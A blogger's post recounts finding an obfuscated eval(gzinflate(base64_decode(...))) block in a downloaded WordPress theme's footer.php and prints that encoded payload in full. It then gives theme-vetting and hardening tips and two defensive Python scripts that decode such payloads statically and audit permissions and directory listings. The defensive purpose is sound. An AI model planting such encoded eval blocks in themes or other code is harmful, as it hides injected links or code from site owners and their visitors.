My Work log 2
Over the life of my blog, I have changed my theme a couple of times. The first one I used was the “Yellow Jacket” of Anthony Baggets, but I found out that a two-column theme, with only one sidebar, is not enough for all the stuff I want to put on my blog, so I tried a couple of themes and spent almost a month looking for the right theme, one I could use for the rest of my blog’s life. I ended up downloading my final theme from a site I choose not to name; they really have a nice line of themes in every category you can think of.
So I downloaded a couple of themes from that site, uploaded them to my site and tested them to see what they really look like with my blog’s contents. But all of the two- or three-sidebar themes, which is what I thought they were, only showed one sidebar. So what happened is that I had to check all the CSS and PHP code the theme creator used to define all the files inside the theme, which is really a pain in the ass for a noob in CSS and PHP like me. I had three themes to choose from and all of them had the same problem, so what I did was pick the one I really liked and start from there. To make a long story short, it was good that everything was not properly set up, because I got the chance to look at every line of code inside the theme and found all the evil stuff inside it.
This is the code I found in my theme’s “footer.php” file (obviously not normal PHP code) that made me very suspicious and had me spending weeks googling how to find out how evil my theme was.
<?php eval(gzinflate(base64_decode('lVJNT8MwDD3TX2HCZUi0FVdIM8EEAgkJhKZxnLLWXSK1cUjSVfDrSdvxJeBATo
97Pf8MRcJr/QOdFWwmiigYyI5gPgSAG4Fr8kE8PoVC3bKoJZlNFboKmnkCVw4LZsTuMFmh0GX0eOl8alHp2smHqh
HhxVsXoBLUA7rgqkQ7Fme9+Qq69D7zDpisLxd3l0V7NohwtN7CJYKW/Rsr6GkhlzBjhbjY+ITlwxyJzDPB6zguRQZ
LBzKEPkvf+Hv+2wr202DijqPWUnth4qVLGXQZOARTZDNnwLuTaMNTuwL6bWhb+yXjrqtCr92H9l7G0bFdex5o
M8ZBB2aON3/D+BH7x+m3S+TH6Yp8LlVFrBUBFsMa9O16+curgr97Pgc5gL2v2yPDLpFt/aB7Ox0AngsyVQRkK
Zi6PuA5/F4xFj9aDqfMZR89XdG79B5hEzVGNcxAUaG3q6nrNlxLD+kbah6iSeZq9A2YgQl8AY=')));?>
Giving credit to the creator and sponsor of the theme is not a problem for me, as long as it’s fair and safe.
So I ask you: how safe is your theme? Did you check it? Remember, even wordpress.org had a problem with the sponsored themes submitted to it. Some bloggers didn’t realize that the WordPress themes they had recently downloaded and installed on their blogs had hidden links, unwanted advertising and other nasty stuff. So here are a couple of suggestions and tools I found around the blogosphere; go through them before you upload a theme to your web host:
1. Search the theme’s template files for “http://” and check every link reference you find. If a link goes somewhere you don’t want it to go, remove it, change the URL, or try another theme. Note that this search cannot find a link hidden inside an encoded payload like the one above, where the URL only exists after base64_decode() and gzinflate() have run; search for “eval”, “base64_decode” and “gzinflate” as well, and treat any hit in a theme as suspicious.
2. Search for “script”: search your template files for the word “script”, which indicates JavaScript. It could be a safe one, put there to help with the design; if so, it would be mentioned in the theme’s readme file, or it would load a file inside your theme’s folder that you can open to see what the script does. If it loads from an off-site location, or looks suspicious, assume that it is.
3. View the generated page source: using your browser’s View > View Page Source feature, look at the HTML of a page your WordPress blog actually serves. You might not understand all of it, but look closely for anything that links to an off-site location, or for a bit of code that looks odd or like an advertisement, such as what I found in my footer, where such code is usually placed. This is the one check an obfuscated block like the one above cannot dodge: whatever the eval() prints ends up in the served page.
4. Test it with the WordPress Theme Scanner plugin before using it.
5. Remove the version meta tag: in your blog’s header.php template, remove the meta tag named “generator”, which states which version of WordPress you are running. It only helps attackers pick the right exploit for that version. Hiding the number does not fix the holes in an old version, though, so keep WordPress itself up to date as well.
6. Prevent access to your WordPress folders: if you open your plugins directory in a browser at www.example.com/wp-content/plugins you may see a listing of all the plugin files and directories. So can everyone else. The same may go for some of your other WordPress directories. On Apache, an empty index.php in each directory, or “Options -Indexes” in your .htaccess, stops the listing.
7. Change file permissions: you can set files and directories to allow different degrees of access, from preventing any change to a file at all to allowing changes only by a particular user or program. “Changing File Permissions” in the WordPress Codex explains how to change file and folder permissions on your server; if you open them up temporarily (say, to let a plugin write a file), change them back afterwards.
8. Prevent login access: try the Login LockDown plugin, which blocks an IP address after a number of failed login attempts and so reduces the chance of someone brute-forcing their way into your WordPress installation.
9. Monitor your blog for downtime and breakdowns. A breakdown can show up immediately, be overlooked for a while, or happen unpredictably. Very rarely are the evil-doers the culprits; it’s usually something the blog owner has done that breaks the blog.
10. Back up your WordPress blog: the database, your themes and plugins directories, your files and images, and all non-WordPress files.
Before installing and activating a WordPress plugin or theme, or making any change to your WordPress blog, back it up! That way, if something does happen, whether for evil reasons or just “one of those glitches in the system”, you have a copy to put things right back to the last time they were right.
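The checks in tips 1 to 4 can be automated, and the obfuscated footer.php code above can be read without ever running it. The scanner below is an added example, not code from this post or from any WordPress tool: it stands in for PHP’s base64_decode() and gzinflate() with Python’s base64 and zlib modules (gzinflate() is raw DEFLATE, so zlib is called with negative window bits), peels nested eval() layers, and then applies the “http://” and “script” searches to both the visible source and the decoded payloads, which is where a hidden sponsor link actually lives. The footer.php content it scans is constructed for the demo, and the hosts example.com and example.net are placeholders.

```python
"""Static scanner for WordPress theme files: decodes eval(gzinflate(base64_decode('...')))
payloads with pure-Python stand-ins for the PHP functions, so nothing from the theme is
executed, then lists off-site links and external scripts found in the visible source
and inside the decoded payloads. Added example; the sample footer below is constructed."""
import base64
import codecs
import re
import zlib
from pathlib import Path

# The idiom from the footer.php above: eval(<decoder>(<decoder>('blob'))).
PAYLOAD_RE = re.compile(
    r"eval\s*\(\s*(?P<chain>(?:(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(\s*)+)"
    r"['\"](?P<blob>[A-Za-z0-9+/=\s]*)['\"]", re.IGNORECASE)
FUNC_RE = re.compile(r"[a-z0-9_]+", re.IGNORECASE)
URL_RE = re.compile(r"https?://([^/'\"\s<>]+)", re.IGNORECASE)          # group 1 = host
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)

# Pure-Python counterparts of the PHP decoders used in such chains.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -zlib.MAX_WBITS),   # raw DEFLATE, no zlib header
    "gzuncompress": zlib.decompress,                               # zlib-wrapped DEFLATE
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
}

def decode_payloads(src, max_depth=8):
    """Return the plaintext of every eval(...) payload in src, peeling nested layers."""
    found = []
    for m in PAYLOAD_RE.finditer(src):
        chain = FUNC_RE.findall(m.group("chain"))             # outermost first
        data = re.sub(r"\s+", "", m.group("blob")).encode()   # blobs are often wrapped across lines
        try:
            for name in reversed(chain):                        # innermost decoder runs first
                data = DECODERS[name.lower()](data)
        except (ValueError, zlib.error):
            found.append("<undecodable payload at offset %d>" % m.start())
            continue
        text = data.decode("latin-1")
        found.append(text)
        if max_depth > 0:                                       # payloads are frequently wrapped twice
            found.extend(decode_payloads(text, max_depth - 1))
    return found

def offsite_hosts(src, own_hosts):
    """Tip 1: hosts behind http(s):// links that are not yours."""
    return {h.lower() for h in URL_RE.findall(src)} - {h.lower() for h in own_hosts}

def external_scripts(src):
    """Tip 2: <script src=...> loading from off the theme (absolute or protocol-relative URL)."""
    return [s for s in SCRIPT_SRC_RE.findall(src) if re.match(r"(https?:)?//", s, re.IGNORECASE)]

def scan_source(src, own_hosts):
    """Findings for one file; links hidden inside decoded payloads count as well."""
    payloads = decode_payloads(src)
    everything = src + "\n" + "\n".join(payloads)
    return {
        "payloads": payloads,
        "offsite": sorted(offsite_hosts(everything, own_hosts)),
        "scripts": external_scripts(everything),
    }

def scan_theme(theme_dir, own_hosts):
    """Walk a theme directory; returns {relative path: findings} for files with anything to report."""
    report = {}
    for path in sorted(Path(theme_dir).rglob("*")):
        if path.suffix.lower() in {".php", ".js", ".html", ".css", ".txt"}:
            finding = scan_source(path.read_text(encoding="latin-1"), own_hosts)
            if any(finding.values()):
                report[str(path.relative_to(theme_dir))] = finding
    return report

def obfuscate(code):
    """Build the eval(gzinflate(base64_decode('...'))) wrapper; used only to construct the sample."""
    co = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = co.compress(code.encode()) + co.flush()
    return "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(raw).decode()

# Constructed footer.php: a tracking script in the clear plus a sponsor link hidden two layers deep.
SAMPLE_HIDDEN = 'echo "<a href=\\"http://example.net/sponsor\\">Sponsored</a>";'
SAMPLE_FOOTER = (
    '<div id="footer">Powered by WordPress</div>\n'
    '<script src="http://ads.example.net/track.js"></script>\n'
    "<?php " + obfuscate(obfuscate(SAMPLE_HIDDEN)) + " ?>"
)

if __name__ == "__main__":
    for key, value in scan_source(SAMPLE_FOOTER, {"example.com"}).items():
        print(key, value)
```

Run it against a real theme with scan_theme('/path/to/wp-content/themes/mytheme', {'yourblog.example'}). An empty report means the scanner found nothing, not that the theme is clean: PAYLOAD_RE only knows the common decoder names, so a chain using another function (or a variable holding the blob) still needs a manual read.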
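For tips 5 to 7, here is a second added example (again not this post’s or WordPress’s own code) that audits a WordPress tree on disk: it finds templates that print the version string, directories that lack the index.php “Silence is golden” guard WordPress ships in wp-content and wp-content/plugins, and files or directories more permissive than 644/755. The mini install it builds under a temporary directory is constructed for the demo, and the 644/755 limits are the usual recommendation, assumed here and easy to tighten.

```python
"""Local audit for tips 5 to 7: templates that print the WordPress version, directories
that would show a bare listing, and files writable by group or others. Added example,
not the original post's code; the sample install it builds is constructed for the demo,
and 644/755 are the assumed limits for files/directories."""
import os
import re
import stat
import tempfile
from pathlib import Path

# Old themes hard-coded the version into header.php; WordPress core also adds it via wp_head().
GENERATOR_RE = re.compile(r"""<meta\s+name=["']generator["']|bloginfo\(\s*['"]version['"]\s*\)""", re.I)
INDEX_GUARDS = ("index.php", "index.html")
MAX_FILE_MODE, MAX_DIR_MODE = 0o644, 0o755

def generator_leaks(root):
    """Tip 5: PHP files that emit the version string (check the rendered page source too)."""
    return sorted(str(p.relative_to(root)) for p in Path(root).rglob("*.php")
                  if GENERATOR_RE.search(p.read_text(encoding="latin-1")))

def listable_dirs(root):
    """Tip 6: directories without an index file, which Apache will list unless
    "Options -Indexes" is set in .htaccess."""
    return sorted(str(p.relative_to(root)) for p in Path(root).rglob("*")
                  if p.is_dir() and not any((p / g).exists() for g in INDEX_GUARDS))

def loose_permissions(root):
    """Tip 7: anything more permissive than 644 (files) / 755 (directories), e.g. 666 or 777."""
    findings = []
    for p in Path(root).rglob("*"):
        mode = stat.S_IMODE(p.stat().st_mode)
        limit = MAX_DIR_MODE if p.is_dir() else MAX_FILE_MODE
        if mode & ~limit:
            findings.append((str(p.relative_to(root)), oct(mode)))
    return sorted(findings)

def build_sample_install():
    """Create a constructed mini WordPress tree with one of each problem; returns its root."""
    root = Path(tempfile.mkdtemp(prefix="wp-audit-"))
    files = {
        "index.php": "<?php require 'wp-blog-header.php'; ?>",
        "wp-config.php": "<?php define('DB_NAME', 'wp'); ?>",
        "wp-content/index.php": "<?php // Silence is golden. ?>",
        "wp-content/plugins/hello.php": "<?php // plugin ?>",            # plugins/ has no index file
        "wp-content/themes/index.php": "<?php // Silence is golden. ?>",
        "wp-content/themes/mytheme/header.php":
            '<meta name="generator" content="WordPress <?php bloginfo(\'version\'); ?>" />',
        "wp-content/themes/mytheme/index.php": "<?php get_header(); ?>",
    }
    for rel, body in files.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body)
    for p in root.rglob("*"):                      # normalise so the result does not depend on umask
        os.chmod(p, MAX_DIR_MODE if p.is_dir() else MAX_FILE_MODE)
    os.chmod(root / "wp-config.php", 0o666)        # the one deliberately loose file
    return root

if __name__ == "__main__":
    root = build_sample_install()
    print("version leaks:", generator_leaks(root))
    print("listable dirs:", listable_dirs(root))
    print("loose perms:  ", loose_permissions(root))
```

Point the three functions at a real document root (for example generator_leaks('/var/www/html')) after a theme or plugin install, and again after you have changed permissions for an upgrade, since that is when the 777 directories tend to be left behind.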
My best and last tip: don’t do dumb stuff. When in doubt, don’t.
I ask all bloggers who have had an experience like this to share their solutions and the evil stuff they found inside their themes, to help make other bloggers aware of what is being done to them. Let’s keep WordPress blogs safe!
Source: www.lorelle.wordpress.com / www.blogsecurity.net